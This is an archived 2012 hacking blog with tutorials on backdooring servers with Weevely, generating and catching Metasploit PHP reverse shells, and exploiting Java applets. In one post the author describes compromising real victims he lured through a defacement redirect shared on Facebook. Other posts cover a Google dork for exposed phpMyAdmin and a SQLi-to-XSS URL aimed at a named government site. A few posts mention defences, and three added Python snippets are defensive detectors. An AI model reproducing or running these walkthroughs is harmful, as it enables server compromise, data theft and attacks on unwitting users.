Tuesday 30 October 2012

Ajith KP

Python Directory, Admin Page, phpMyAdmin and Shell Scanner

Hi guyzzz, after a long time I have made a new tool in Python to scan for directories, admin pages, phpMyAdmin, and shells.

It works on Linux. It is hard to run on Windows because the text colors cause problems there.

Download Link: https://packetstormsecurity.com/files/117773/Directory-Scanner-Tool.html



Hope you like this... Please write your comments....

Monday 29 October 2012

Ajith KP

phpMyAdmin DB --> Google Dork

Some foolish admins forget to hide phpMyAdmin.

An exposed phpMyAdmin can be used to pWn the database directly, without other exploits like SQLi.

The DB can be obtained directly.

Google Dork: inurl:"index.php?db=information_schema"

Look at the image below to see how phpMyAdmin looks...
Let's pWn the database....

Saturday 27 October 2012

Ajith KP

"r00t"ing server with WEEVELY

WEEVELY is a Python application that helps a hacker backdoor a server and r00t it.

Download : http://cloud.github.com/downloads/epinna/Weevely/weevely-0.7.1.tar.gz

Generating BackDoor[PHP]

terminal@terminal:~/weavely$ python ./weevely.py generate ajithkp

[python ./weevely.py generate <password> --> here ajithkp is my password]


Getting "TERMINAL" to r00t

Upload the generated PHP shell to the server.
Eg. http://shelled.com/path/to/the/reverse.php

Execute this command in your terminal,

terminal@terminal:~/weavely$ python ./weevely.py http://shelled.com/path/to/the/reverse.php ajithkp

[python ./weevely.py <urltobackdoor> <password>]

After connecting successfully...

I'm going to execute whoami

Now going to change the current directory to /home/
$ cd /home/
$ ls -al


Hope you will like this hacking tutorial... Happy r00ting... I don't like to r00t servers and mass deface now... I only love to breach security... Fuck Security!!!!!

Ajith KP

DirDictionaryBruter Directory and Files Brute Forcer

This simple Python application helps find unlinked files on a server.
You need a good dictionary, saved as "DirList" in the same directory as the Python file.

Run it with,

python ./DirBrute.py

Input the URL whose directories you want to brute force.

It saves a log of the files and directories it finds in "DirLogs.log"

Open it and read it. It will help you find hidden juicy files such as admin pages, text files, uploaded PHP shells, etc.

Have fun with it...

Source Code


Wednesday 24 October 2012

Ajith KP

PHP Reverse Shell [Edited]

[NOTE: This was not coded by me. The real code is generated by Metasploit. I have just edited it to add some features]
Guyzzz, I have edited the PHP reverse shell generated by Metasploit. I have added a feature to find the attacker's IP address automatically. Now it works awesomely because we don't need to change the IP address in the PHP script if your IP address is dynamic.

Tuesday 23 October 2012

Ajith KP

Generate Reverse Shells using Metasploit

Metasploit has built-in support for generating reverse shells. You can create them with very short commands.

PHP Reverse Shell

A PHP reverse shell can be created with one short command.

  1. Open a terminal in your Linux OS.
  2. Copy the command below and execute it. That is all it takes to generate the PHP reverse shell.

Note:

  Replace LHOST=117.235.152.218 LPORT=5600 with your IP address and your favorite port [Use any port other than reserved ports like 80, 8080, 23, etc.]

[Note: reverse_perl.pl is created by another command. We don't need it here.]
Upload reverse.php to any server.

[Download this CommandExecutor & Uploader from here ]

Open the uploaded reverse.php in your favourite web browser.

Accept the Reverse Connection Using Metasploit

Open Metasploit Console.

msf > use multi/handler
msf  exploit(handler) > set LHOST 117.235.152.218
LHOST => 117.235.152.218
msf  exploit(handler) > set LPORT 5600
LPORT => 5600
msf  exploit(handler) > exploit -z -j

After successfully connecting, you can execute "shell" to pWn the target's terminal. Then r00t your targets.



Thursday 18 October 2012

Ajith KP

Java Applet Field Bytecode Verifier Cache Remote Code Execution with Social Engineering

Guyz, browser AutopWn using this Metasploit module is very easy. It is also a new threat in the cyber world.

Open Metasploit Console.

msf > use exploit/multi/browser/java_verifier_field_access



msf  exploit(java_verifier_field_access) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Generic (Java Payload)
   1   Windows x86 (Native Payload)
   2   Mac OS X PPC (Native Payload)
   3   Mac OS X x86 (Native Payload)
   4   Linux x86 (Native Payload)






msf  exploit(java_verifier_field_access) > set LHOST 117.231.34.82
LHOST => 117.231.34.82
msf  exploit(java_verifier_field_access) > set LPORT 560
LPORT => 560
msf  exploit(java_verifier_field_access) > set URIPATH /
URIPATH => /
msf  exploit(java_verifier_field_access) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 117.231.34.82:560
msf  exploit(java_verifier_field_access) > [*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://117.231.34.82:8080/
[*] Server started.

Yes we have set up a malicious server at http://117.231.34.82:8080/

I have already hacked a server.

I added a deface page "pirr.html" with a JavaScript

<SCRIPT language="javascript">window.location="http://117.231.34.82:8080/";</SCRIPT>




It will redirect the victim to my malicious server :p

I shared the deface page link in my facebook. [Social Engineering :p]





Yes I got two victims to F*cK.

I select 2nd victim to pWn... MmMmMm....


sessions -i 2
meterpreter> sysinfo
computer : xxxxxxx
os : xxxxxxx
meterpreter: java/java
meterpreter> shell





Yes my pen*s have touched her a*s.

meterpreter> pwd
/home/xxxxxxxx


meterpreter> ls -al


Yes it penetrated into there.
Now I pWned here.


Guyz if you like this post please post your comments... :)

Saturday 13 October 2012

AJITH KP

Java Signed Applet Remote Code Execution with Metasploit

This is a new threat in the cyber world. [Metasploit]

It enables a hacker to execute commands on the victim's computer.

Here I have made a tutorial to hack a PC using this vulnerability.

You need to install the module. I'm not going to describe how to install the module.

Open Metasploit Console.

Input the command,

>use exploit/multi/browser/java_signed_applet


The first step is over; now you need to set up a malicious server on your PC.

Find your IP address as the first step in setting up the malicious server.

Open Command Prompt and execute the command ipconfig
[For Linux users: ifconfig]

Next, execute a series of commands in Metasploit Console.

>set LHOST 117.230.54.146
>set LPORT 560
>set URIPATH ajithkp560
>set TARGET 0
>exploit -j

Yes, we have set up the malicious server at http://117.230.54.146:8080/ajithkp560 :)

Yeah, now Metasploit has started waiting for the victim to connect.

This image was taken by me without using the command set URI ajithkp560

Yes, the victim will connect if he runs the Bytecode Verifier. :p

Yes, we are done....



>sessions -i 1

This command connects to the first victim who connected to your malicious server.
Now we have connected to the first victim :p

Yo... Baby we have connected to our victim.

The next command accesses the victim's Command Prompt :p

>execute -H -i -f "cmd"

Yo... Yo... pWned Command Prompt of victim :p


Now I'm going to Change Directory to E:\

>e:\
>dir

Guyz, I have spent 1 hour creating this tutorial and pWning the victim. So please spend your 10 seconds to write your comments...

Friday 12 October 2012

AJITH KP

Domain Watcher

It is a PHP application that helps you find the domains and users hosted on a shelled server.

But it cannot symlink the server. We recommend "Mannu Shell" by IndiShell for symlinking.

It is just for viewing the domains and their owners.

Code:

Note: This application is not fully coded by mE...

AJITH KP

Java Applet : Your First Program

Java applets are web applications written in Java. They are very easy to study and also easy to program. Here I would like to create a simple Java applet with a black background and green text. Save it as FirstApplet.java

Code:

Compile this to bytecode using the command "javac FirstApplet.java". After successful compilation you will get a class file named FirstApplet.class

Next you need to create an HTML page to run this applet

Code:

Save the above code under any name you wish, but it must have the .html extension.

Now open this HTML page in your favorite browser


Wednesday 10 October 2012

Ajith KP

C Program to print increasing of "*"

It is a program to teach the "for loop" to starters. Here is the code

Code


It is not pro code... It is only starter code.

Ajith KP

RFI Vulnerability: Arises and Defence

RFI is a type of attack in which the attacker tries to execute PHP commands. I have explained both Remote Command and Remote Code Execution in a previous post. Read here

The code below is an example of an RFI-enabled PHP page.



Save this as page.php and open the URL,

http://localhost/path/to/page.php?page=http://www.terminalcoders.blogspot.in

You will see http://www.terminalcoders.blogspot.in opened in your browser on localhost.

Some Protection methods

A simple way to protect against RFI is to edit the php.ini file. Open php.ini in an editor, find allow_url_fopen and allow_url_include, and change them from on to off. This stops the page from including a remote page...

Also in php.ini, change register_globals from on to off, and use E_STRICT to find uninitialized variables.

Next, edit .htaccess on the Apache server. Copy the code below and add it to .htaccess



It will redirect any request that includes a malicious query to http://www.terminalcoders.blogspot.in
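
An added example (not part of the original post): a small Python check that reads the text of a php.ini and reports which of the three directives named under "Some Protection methods" are still effectively on. The SAMPLE text is constructed, and the DEFAULTS table is an assumption of this example that mirrors PHP's built-in values for directives missing from the file.

```python
# Directives the post says to switch off (real PHP ini directive names;
# register_globals was removed in PHP 5.4 and only matters on older installs).
REQUIRED_OFF = ("allow_url_fopen", "allow_url_include", "register_globals")
TRUTHY = {"1", "on", "yes", "true"}

# Value PHP uses when the directive does not appear in php.ini at all.
DEFAULTS = {"allow_url_fopen": "1", "allow_url_include": "0", "register_globals": "0"}

def parse_ini(text):
    """Return the effective directive values; the last assignment wins."""
    values = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # ';' starts a comment
        if not line or line.startswith("["):     # skip blanks and [sections]
            continue
        key, sep, val = line.partition("=")
        if sep:
            # Directive names are case sensitive in PHP, values are not.
            values[key.strip()] = val.strip().strip("\"'").lower()
    return values

def audit(text):
    """List (directive, value, 'set' or 'default') for each one left on."""
    values = parse_ini(text)
    findings = []
    for name in REQUIRED_OFF:
        val = values.get(name, DEFAULTS[name])
        if val in TRUTHY:
            findings.append((name, val, "set" if name in values else "default"))
    return findings

# Constructed php.ini fragment for the demonstration.
SAMPLE = """\
[PHP]
; allow_url_include = Off   (commented out, so PHP ignores it)
allow_url_include = On
register_globals = Off
error_reporting = E_ALL | E_STRICT
"""

if __name__ == "__main__":
    for name, val, source in audit(SAMPLE):
        print(f"{name} is on (value {val!r}, {source})")
```

Note that allow_url_fopen is reported even though the sample never mentions it, because it defaults to on when the line is absent.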

Sunday 7 October 2012

Ajith KP

AJJA Command Executor

Guyzzz, we have coded a simple command executor shell in PHP. Take a look at this shell.


Source Code

Thursday 4 October 2012

Ajith KP

Remote Command 'N Code Execution with Examples

Guyzzz, welcome to _TERMINAL_CODERS_. Here I would like to explain Remote Command and Remote Code Execution attacks with examples.

We can execute remote commands with two different methods.
  • Exec : We can execute commands on the remote machine, but the string result and the intermediate output cannot be seen. The command is still executed there.
  • Passthru : We can execute a command and the result is also visible.

Remote Command Execution

A Remote Command Execution attack is a type of attack in which the attacker can execute "System Commands" on a remote machine.
An example of remote command execution with the Exec method is LFI [Local File Inclusion]. Let's start LFI with examples. An LFI vulnerability arises when the programmer includes further pages or data without properly sanitizing the input.
Create a PHP file with the code below,
Code: 
 


Save the above code as "index.php".

Next create another PHP file with the code below,

Code:


Save this as "contact.php".

Next create another PHP page with the code below,

Code:


Save this as "file.php".

The file "file.php" has not declared the file properly.

So let's open "index.php" in your browser.

file.php starts with index.php. Now change the URL to "http://localhost/LFI/file.php?file=contact.php"

Now it has opened contact.php. This is the LFI vulnerability. Read Hack with LFI Vulnerability Devil'sCafe


Next, remote command execution with the "passthru" method.

Create a PHP file with the code below,

Code:


Save the code as "cmd.php".

Open it in a browser. You will not see anything yet.
Change the URL to "http://localhost/cmd/cmd.php?cmd=dir"
 [I'm using Windows OS. So I use Windows System Command].

You will get a result like the image below.

Remote Code Execution  

Unlike Remote Command Execution, Remote Code Execution is an attack that executes PHP commands on the remote machine. An example of Remote Code Execution is "RFI" [Remote File Inclusion].

Copy the code below,

Code:


Save it as "page.php"

Open it in your browser. You can see the heading "_TERMINAL_CODERS_"

Now change the URL to,
"http://localhost/RFI/page.php?page=http://www.terminalcoders.blogspot.in"

Guyzzz I have spent about half an hour to create this tutor...
Please spend your 30 seconds to add your comments...
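
An added example (not part of the original post): a Python triage function for web-server request targets that flags the include-parameter abuse described above, where a file= or page= value carries a remote URL, a traversal sequence or an absolute path instead of a local page name. The parameter names come from the post's file.php and page.php URLs; the third and fourth sample requests and the finding labels are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter names taken from the post's file.php?file= and page.php?page= URLs.
INCLUDE_PARAMS = {"file", "page"}
REMOTE = re.compile(r"^\s*(?:(?:https?|ftp|php)://|data:)", re.I)
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
ABSOLUTE = re.compile(r"^(?:[\\/]|[a-z]:[\\/])", re.I)

def normalise(value, rounds=3):
    """Undo layered percent-encoding (bounded), since an application that
    decodes its input a second time would act on the inner form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return sorted (param, finding) pairs for one request target."""
    findings = set()
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() not in INCLUDE_PARAMS:
            continue
        value = normalise(value)
        if REMOTE.match(value):
            findings.add((name, "remote-include"))
        elif TRAVERSAL.search(value) or "\x00" in value:
            findings.add((name, "path-traversal"))
        elif ABSOLUTE.match(value):
            findings.add((name, "absolute-path"))
    return sorted(findings)

def triage(targets):
    """Map each suspicious target to its findings; clean ones are dropped."""
    results = {t: classify(t) for t in targets}
    return {t: f for t, f in results.items() if f}

# Constructed request targets; the first two are the URLs used in the post.
SAMPLES = [
    "/LFI/file.php?file=contact.php",
    "/RFI/page.php?page=http://www.terminalcoders.blogspot.in",
    "/LFI/file.php?file=..%252F..%252Fconfig.inc",
    "/LFI/file.php?file=C:%5Cxampp%5Cphp%5Cphp.ini&lang=/en",
]

if __name__ == "__main__":
    for target, found in triage(SAMPLES).items():
        print(target, found)
```

The plain contact.php request is not flagged, which is why input like this needs an allowlist in the application itself and not only log review.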

Wednesday 3 October 2012

AJITH KP

XSS via SQL Injection


Hello Guys. You can use SQLi instead of XSS injection. Yes, it is a simple trick.

[0x01] You have an SQLi vulnerability in a website
http://www.vulnerable.com/index.php?id=560

[0x02] Next, count the columns. You got 5 columns and column 3 is vulnerable.

[0x03] Next, encode your JavaScript as a hexadecimal value.
Eg. <script>alert("Ajith 'n Ajmal")</script> 's hexadecimal value is 3c7363726970743e616c6572742822416a69746820276e20416a6d616c22293c2f7363726970743e

[0x04] Insert the hexadecimal value into the group_concat function.
The URL is now

www.vulnerable.com/index.php?id=560+UNION+SELECT+1,2,group_concat(0xhexadecimalvalue),4,5

 
Eg. http://www.commerce.gov.pk/ptmaview.php?ID=-32+union+select+1,2,3,group_concat%280x3c7363726970743e616c6572742822416a69746820274e20416a6d616c22293c2f7363726970743e%29,5,6,7,8,9,10,11,12,13,14 

[0x05] By Team AJJA[Ajith Kp | Jhelai Sahadevan | Jitendra Singh | Ajmal Joshi] Hope You Like this trick... if you share this in your blogs please add my link to this blog...
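
An added example (not part of the original post): detection logic in Python for the request pattern this trick produces, a UNION SELECT whose 0x hex literal decodes to HTML or script markup. The access-log lines, client addresses and verdict labels are constructed for this example; the hex string is the one quoted in step [0x03].

```python
import re
from urllib.parse import urlsplit, unquote_plus

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION_SELECT = re.compile(r"union\s+(?:all\s+)?select", re.I)
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2})+)", re.I)
MARKUP = re.compile(r"<\s*/?\s*(?:script|iframe|svg|img)\b|javascript:", re.I)

def inspect(target):
    """Classify one request target; return (verdict, decoded markup payloads)."""
    query = unquote_plus(urlsplit(target).query)   # '+' and %XX become plain text
    if not UNION_SELECT.search(query):
        return "clean", []
    payloads = []
    for match in HEX_LITERAL.finditer(query):
        # MySQL reads 0x... as a string, so decode it the way the database would.
        text = bytes.fromhex(match.group(1)).decode("latin-1")
        if MARKUP.search(text):
            payloads.append(text)
    return ("sqli+markup" if payloads else "sqli"), payloads

def scan(lines):
    """Return (client, verdict, payloads) for every non-clean log line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        verdict, payloads = inspect(m.group(2))
        if verdict != "clean":
            hits.append((m.group(1), verdict, payloads))
    return hits

# Constructed access-log lines (documentation addresses, made-up paths).
HEX = "3c7363726970743e616c6572742822416a69746820276e20416a6d616c22293c2f7363726970743e"
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Oct/2012:10:01:02 +0000] "GET /index.php?id=560 HTTP/1.1" 200 512',
    '203.0.113.9 - - [03/Oct/2012:10:01:09 +0000] "GET /index.php?id=560+UNION+SELECT+1,2,3,4,5 HTTP/1.1" 200 498',
    '203.0.113.9 - - [03/Oct/2012:10:01:30 +0000] "GET /index.php?id=-1+union+select+1,2,'
    'group_concat%280x' + HEX + '%29,4,5 HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for client, verdict, payloads in scan(SAMPLE_LOG):
        print(client, verdict, payloads)
```

Decoding the literal matters because the raw request contains no angle brackets, so a filter that only looks for script tags in the URL never sees the markup.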